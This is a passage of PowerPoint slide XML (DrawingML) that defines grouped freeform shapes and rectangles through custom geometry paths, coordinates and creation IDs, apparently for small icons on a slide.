                <a:ext cx="430" cy="412"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1342"/>
                  <a:gd name="T1" fmla="*/ 361 h 1285"/>
                  <a:gd name="T2" fmla="*/ 0 w 1342"/>
                  <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                  <a:gd name="T4" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T5" fmla="*/ 923 h 1285"/>
                  <a:gd name="T6" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T7" fmla="*/ 0 h 1285"/>
                  <a:gd name="T8" fmla="*/ 0 w 1342"/>
                  <a:gd name="T9" fmla="*/ 361 h 1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2" h="1285">
                    <a:moveTo>
                      <a:pt x="0" y="361"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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951" name="Group 1361">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D14D34A4-59BE-4D8D-8C6D-E8949B47AF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6" y="843"/>
                <a:ext cx="329" cy="240"/>
                <a:chOff x="786" y="843"/>
                <a:chExt cx="329" cy="240"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="952" name="Group 1362">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9140D0A-17CF-4E1C-B0DA-D9350914871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7" y="843"/>
                  <a:ext cx="158" cy="240"/>
                  <a:chOff x="953" y="846"/>
                  <a:chExt cx="166" cy="239"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="956" name="Freeform 1363">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E824DB48-A506-43E8-B572-EBA50E6CD4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953" y="933"/>
                    <a:ext cx="166" cy="152"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 218 w 219"/>
                      <a:gd name="T1" fmla="*/ 14 h 200"/>
                      <a:gd name="T2" fmla="*/ 201 w 219"/>
                      <a:gd name="T3" fmla="*/ 2 h 200"/>
                      <a:gd name="T4" fmla="*/ 15 w 219"/>
                      <a:gd name="T5" fmla="*/ 52 h 200"/>
                      <a:gd name="T6" fmla="*/ 0 w 219"/>
                      <a:gd name="T7" fmla="*/ 73 h 200"/>
                      <a:gd name="T8" fmla="*/ 1 w 219"/>
                      <a:gd name="T9" fmla="*/ 186 h 200"/>
                      <a:gd name="T10" fmla="*/ 17 w 219"/>
                      <a:gd name="T11" fmla="*/ 198 h 200"/>
                      <a:gd name="T12" fmla="*/ 202 w 219"/>
                      <a:gd name="T13" fmla="*/ 148 h 200"/>
                      <a:gd name="T14" fmla="*/ 219 w 219"/>
                      <a:gd name="T15" fmla="*/ 127 h 200"/>
                      <a:gd name="T16" fmla="*/ 218 w 219"/>
                      <a:gd name="T17" fmla="*/ 14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19" h="200">
                        <a:moveTo>
                          <a:pt x="218" y="14"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="218" y="5"/>
                          <a:pt x="210" y="0"/>
                          <a:pt x="201" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="52"/>
                          <a:pt x="15" y="52"/>
                          <a:pt x="15" y="52"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="54"/>
                          <a:pt x="0" y="64"/>
                          <a:pt x="0" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="186"/>
                          <a:pt x="1" y="186"/>
                          <a:pt x="1" y="186"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="195"/>
                          <a:pt x="8" y="200"/>
                          <a:pt x="17" y="198"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="202" y="148"/>
                          <a:pt x="202" y="148"/>
                          <a:pt x="202" y="148"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="212" y="146"/>
                          <a:pt x="219" y="136"/>
                          <a:pt x="219" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="219" y="94"/>
                          <a:pt x="218" y="14"/>
                          <a:pt x="218" y="1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7" name="Freeform 1364">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9F8049C-700B-4455-A5EC-4E322A5929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984" y="846"/>
                    <a:ext cx="101" cy="102"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 68 w 133"/>
                      <a:gd name="T1" fmla="*/ 125 h 135"/>
                      <a:gd name="T2" fmla="*/ 133 w 133"/>
                      <a:gd name="T3" fmla="*/ 49 h 135"/>
                      <a:gd name="T4" fmla="*/ 67 w 133"/>
                      <a:gd name="T5" fmla="*/ 9 h 135"/>
                      <a:gd name="T6" fmla="*/ 0 w 133"/>
                      <a:gd name="T7" fmla="*/ 85 h 135"/>
                      <a:gd name="T8" fmla="*/ 68 w 133"/>
                      <a:gd name="T9" fmla="*/ 125 h 1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3" h="135">
                        <a:moveTo>
                          <a:pt x="68" y="125"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="115"/>
                          <a:pt x="133" y="81"/>
                          <a:pt x="133" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="133" y="17"/>
                          <a:pt x="103" y="0"/>
                          <a:pt x="67" y="9"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="19"/>
                          <a:pt x="0" y="53"/>
                          <a:pt x="0" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="117"/>
                          <a:pt x="31" y="135"/>
                          <a:pt x="68" y="12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953" name="Freeform 1365">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CDFA176-5023-4DA7-BD3A-B78AE7167B4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786" y="931"/>
                  <a:ext cx="123" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 385"/>
                    <a:gd name="T1" fmla="*/ 163 h 163"/>
                    <a:gd name="T2" fmla="*/ 0 w 385"/>
                    <a:gd name="T3" fmla="*/ 101 h 163"/>
                    <a:gd name="T4" fmla="*/ 385 w 385"/>
                    <a:gd name="T5" fmla="*/ 0 h 163"/>
                    <a:gd name="T6" fmla="*/ 385 w 385"/>
                    <a:gd name="T7" fmla="*/ 61 h 163"/>
                    <a:gd name="T8" fmla="*/ 0 w 385"/>
                    <a:gd name="T9" fmla="*/ 163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5" h="163">
                      <a:moveTo>
                        <a:pt x="0" y="163"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="385" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="385" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="16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1B171B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Freeform 1366">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4F0017-3807-43DF-9B9E-2B02BBBE37E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786" y="969"/>
                  <a:ext cx="123" cy="53"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 385"/>
                    <a:gd name="T1" fmla="*/ 163 h 163"/>
                    <a:gd name="T2" fmla="*/ 0 w 385"/>
                    <a:gd name="T3" fmla="*/ 102 h 163"/>
                    <a:gd name="T4" fmla="*/ 385 w 385"/>
                    <a:gd name="T5" fmla="*/ 0 h 163"/>
                    <a:gd name="T6" fmla="*/ 385 w 385"/>
                    <a:gd name="T7" fmla="*/ 62 h 163"/>
                    <a:gd name="T8" fmla="*/ 0 w 385"/>
                    <a:gd name="T9" fmla="*/ 163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5" h="163">
                      <a:moveTo>
                        <a:pt x="0" y="163"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="102"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="385" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="385" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="16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1B171B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Freeform 1367">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3E6F52-77A0-4E30-9446-C784790ED6F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786" y="1008"/>
                  <a:ext cx="123" cy="53"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 385"/>
                    <a:gd name="T1" fmla="*/ 163 h 163"/>
                    <a:gd name="T2" fmla="*/ 0 w 385"/>
                    <a:gd name="T3" fmla="*/ 101 h 163"/>
                    <a:gd name="T4" fmla="*/ 385 w 385"/>
                    <a:gd name="T5" fmla="*/ 0 h 163"/>
                    <a:gd name="T6" fmla="*/ 385 w 385"/>
                    <a:gd name="T7" fmla="*/ 61 h 163"/>
                    <a:gd name="T8" fmla="*/ 0 w 385"/>
                    <a:gd name="T9" fmla="*/ 163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5" h="163">
                      <a:moveTo>
                        <a:pt x="0" y="163"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="385" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="385" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="16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1B171B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649" name="Freeform 1115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD310C1F-E66B-494A-982B-20B9743E5DBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6165142" y="5441728"/>
              <a:ext cx="1515895" cy="405812"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 161"/>
                <a:gd name="T1" fmla="*/ 22 h 44"/>
                <a:gd name="T2" fmla="*/ 81 w 161"/>
                <a:gd name="T3" fmla="*/ 0 h 44"/>
                <a:gd name="T4" fmla="*/ 161 w 161"/>
                <a:gd name="T5" fmla="*/ 22 h 44"/>
                <a:gd name="T6" fmla="*/ 81 w 161"/>
                <a:gd name="T7" fmla="*/ 44 h 44"/>
                <a:gd name="T8" fmla="*/ 0 w 161"/>
                <a:gd name="T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4">
                  <a:moveTo>
                    <a:pt x="0" y="22"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="44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B2B2B2">
                    <a:gamma/>
                    <a:tint val="68627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650" name="Group 1369">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB0190F-C8D2-4166-A3AA-D357705AF8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00819" y="4704425"/>
              <a:ext cx="375139" cy="375139"/>
              <a:chOff x="562" y="1822"/>
              <a:chExt cx="318" cy="318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="945" name="Rectangle 1370">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4BA9445-39D5-4DEE-8013-79AB43E175E2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840" y="2100"/>
                <a:ext cx="40" cy="4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6" name="Rectangle 1371">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC1FB35-52D5-4D8A-94AF-C937708316D8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759" y="2019"/>
                <a:ext cx="71" cy="71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947" name="Group 1372">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F8F81F-D67B-41C4-A46C-9CDEEF9016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62" y="1822"/>
                <a:ext cx="187" cy="187"/>
                <a:chOff x="-12610" y="18860"/>
                <a:chExt cx="330" cy="331"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="948" name="Rectangle 1373">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D090C49-1168-4CB4-92B5-B32346C8DC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-12610" y="18860"/>
                  <a:ext cx="330" cy="331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1B171B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1374">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5528FD0-B682-4D72-A84E-8D8D35AFFDF9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-12535" y="18898"/>
                  <a:ext cx="182" cy="255"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 77"/>
                    <a:gd name="T1" fmla="*/ 47 h 108"/>
                    <a:gd name="T2" fmla="*/ 62 w 77"/>
                    <a:gd name="T3" fmla="*/ 23 h 108"/>
                    <a:gd name="T4" fmla="*/ 38 w 77"/>
                    <a:gd name="T5" fmla="*/ 0 h 108"/>
                    <a:gd name="T6" fmla="*/ 14 w 77"/>
                    <a:gd name="T7" fmla="*/ 23 h 108"/>
                    <a:gd name="T8" fmla="*/ 38 w 77"/>
                    <a:gd name="T9" fmla="*/ 47 h 108"/>
                    <a:gd name="T10" fmla="*/ 77 w 77"/>
                    <a:gd name="T11" fmla="*/ 61 h 108"/>
                    <a:gd name="T12" fmla="*/ 71 w 77"/>
                    <a:gd name="T13" fmla="*/ 54 h 108"/>
                    <a:gd name="T14" fmla="*/ 5 w 77"/>
                    <a:gd name="T15" fmla="*/ 54 h 108"/>
                    <a:gd name="T16" fmla="*/ 0 w 77"/>
                    <a:gd name="T17" fmla="*/ 61 h 108"/>
                    <a:gd name="T18" fmla="*/ 0 w 77"/>
                    <a:gd name="T19" fmla="*/ 101 h 108"/>
                    <a:gd name="T20" fmla="*/ 5 w 77"/>
                    <a:gd name="T21" fmla="*/ 108 h 108"/>
                    <a:gd name="T22" fmla="*/ 71 w 77"/>
                    <a:gd name="T23" fmla="*/ 108 h 108"/>
                    <a:gd name="T24" fmla="*/ 77 w 77"/>
                    <a:gd name="T25" fmla="*/ 101 h 108"/>
                    <a:gd name="T26" fmla="*/ 77 w 77"/>
                    <a:gd name="T27" fmla="*/ 6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7" h="108">
                      <a:moveTo>
                        <a:pt x="38" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="47"/>
                        <a:pt x="62" y="36"/>
                        <a:pt x="62" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="10"/>
                        <a:pt x="51" y="0"/>
                        <a:pt x="38" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="0"/>
                        <a:pt x="14" y="10"/>
                        <a:pt x="14" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="36"/>
                        <a:pt x="25" y="47"/>
                        <a:pt x="38" y="47"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="77" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="57"/>
                        <a:pt x="74" y="54"/>
                        <a:pt x="71" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="54"/>
                        <a:pt x="0" y="57"/>
                        <a:pt x="0" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="107"/>
                        <a:pt x="0" y="101"/>
                        <a:pt x="0" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="105"/>
                        <a:pt x="2" y="108"/>
                        <a:pt x="5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4" y="108"/>
                        <a:pt x="77" y="105"/>
                        <a:pt x="77" y="101"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="77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51" name="Group 1375">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8CA8334-46A9-4057-BFD3-E2C9A97807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36855" y="4383551"/>
              <a:ext cx="375139" cy="375139"/>
              <a:chOff x="562" y="1822"/>
              <a:chExt cx="318" cy="318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="940" name="Rectangle 1376">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2773AF20-D1DD-43AF-BE40-1B1719B31A0A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840" y="2100"/>
                <a:ext cx="40" cy="4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1" name="Rectangle 1377">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC70D75B-4567-494E-AD01-0002CC60F14A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759" y="2019"/>
                <a:ext cx="71" cy="71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942" name="Group 1378">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7202BB0-7A71-4387-9315-993D7A47F21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62" y="1822"/>
                <a:ext cx="187" cy="187"/>
                <a:chOff x="-12610" y="18860"/>
                <a:chExt cx="330" cy="331"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="943" name="Rectangle 1379">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BFFC814-B233-4750-9740-C0CEC2F118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-12610" y="18860"/>
                  <a:ext cx="330" cy="331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1B171B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Freeform 1380">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB71FDFC-7E0F-45AB-9B64-53EB10952327}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-12535" y="18898"/>
                  <a:ext cx="182" cy="255"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 77"/>
                    <a:gd name="T1" fmla="*/ 47 h 108"/>
                    <a:gd name="T2" fmla="*/ 62 w 77"/>
                    <a:gd name="T3" fmla="*/ 23 h 108"/>
                    <a:gd name="T4" fmla="*/ 38 w 77"/>
                    <a:gd name="T5" fmla="*/ 0 h 108"/>
                    <a:gd name="T6" fmla="*/ 14 w 77"/>
                    <a:gd name="T7" fmla="*/ 23 h 108"/>
                    <a:gd name="T8" fmla="*/ 38 w 77"/>
                    <a:gd name="T9" fmla="*/ 47 h 108"/>
                    <a:gd name="T10" fmla="*/ 77 w 77"/>
                    <a:gd name="T11" fmla="*/ 61 h 108"/>
                    <a:gd name="T12" fmla="*/ 71 w 77"/>
                    <a:gd name="T13" fmla="*/ 54 h 108"/>
                    <a:gd name="T14" fmla="*/ 5 w 77"/>
                    <a:gd name="T15" fmla="*/ 54 h 108"/>
                    <a:gd name="T16" fmla="*/ 0 w 77"/>
                    <a:gd name="T17" fmla="*/ 61 h 108"/>
                    <a:gd name="T18" fmla="*/ 0 w 77"/>
                    <a:gd name="T19" fmla="*/ 101 h 108"/>
                    <a:gd name="T20" fmla="*/ 5 w 77"/>
                    <a:gd name="T21" fmla="*/ 108 h 108"/>
                    <a:gd name="T22" fmla="*/ 71 w 77"/>
                    <a:gd name="T23" fmla="*/ 108 h 108"/>
                    <a:gd name="T24" fmla="*/ 77 w 77"/>
                    <a:gd name="T25" fmla="*/ 101 h 108"/>
                    <a:gd name="T26" fmla="*/ 77 w 77"/>
                    <a:gd name="T27" fmla="*/ 6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7" h="108">
                      <a:moveTo>
                        <a:pt x="38" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="47"/>
                        <a:pt x="62" y="36"/>
                        <a:pt x="62" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="10"/>
                        <a:pt x="51" y="0"/>
                        <a:pt x="38" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="0"/>
                        <a:pt x="14" y="10"/>
                        <a:pt x="14" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="36"/>
                        <a:pt x="25" y="47"/>
                        <a:pt x="38" y="47"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="77" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="57"/>
                        <a:pt x="74" y="54"/>
                        <a:pt x="71" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="54"/>
                        <a:pt x="0" y="57"/>
                        <a:pt x="0" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="107"/>
                        <a:pt x="0" y="101"/>
                        <a:pt x="0" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="105"/>
                        <a:pt x="2" y="108"/>
                        <a:pt x="5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4" y="108"/>
                        <a:pt x="77" y="105"/>
                        <a:pt x="77" y="101"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="77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52" name="Group 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FB801C-7905-4EB0-97F2-FE87FD309119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6832338" y="3282852"/>
              <a:ext cx="281470" cy="465165"/>
              <a:chOff x="5870574" y="2092325"/>
              <a:chExt cx="301626" cy="498475"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="938" name="Freeform 911">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB49697-9051-49F2-8B21-38CDA4E15ECC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021387" y="2133600"/>
                <a:ext cx="150813" cy="457200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 600"/>
                  <a:gd name="T1" fmla="*/ 161 h 1817"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1817"/>
                  <a:gd name="T4" fmla="*/ 600 w 600"/>
                  <a:gd name="T5" fmla="*/ 1656 h 1817"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 0 h 1817"/>
                  <a:gd name="T8" fmla="*/ 0 w 600"/>
                  <a:gd name="T9" fmla="*/ 161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0" h="1817">
                    <a:moveTo>
                      <a:pt x="0" y="161"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="161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9" name="Freeform 912">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8EB79C2-3E25-469D-A197-97CBE2BB2019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5870574" y="2092325"/>
                <a:ext cx="150813" cy="458788"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 600 w 600"/>
                  <a:gd name="T1" fmla="*/ 0 h 1819"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 163 h 1819"/>
                  <a:gd name="T4" fmla="*/ 0 w 600"/>
                  <a:gd name="T5" fmla="*/ 1819 h 1819"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 1656 h 1819"/>
                  <a:gd name="T8" fmla="*/ 600 w 600"/>
                  <a:gd name="T9" fmla="*/ 0 h 18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0" h="1819">
                    <a:moveTo>
                      <a:pt x="600" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0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653" name="Group 681">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3BD966-D3AD-4893-98D7-D33A330418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13897" y="3435435"/>
              <a:ext cx="197029" cy="471090"/>
              <a:chOff x="3735" y="3265"/>
              <a:chExt cx="468" cy="1120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="922" name="Freeform 682">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861BE372-2ED4-4D8A-A5FC-1CE9F5CA0C6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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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3" name="Freeform 683">
                <a:extLst>
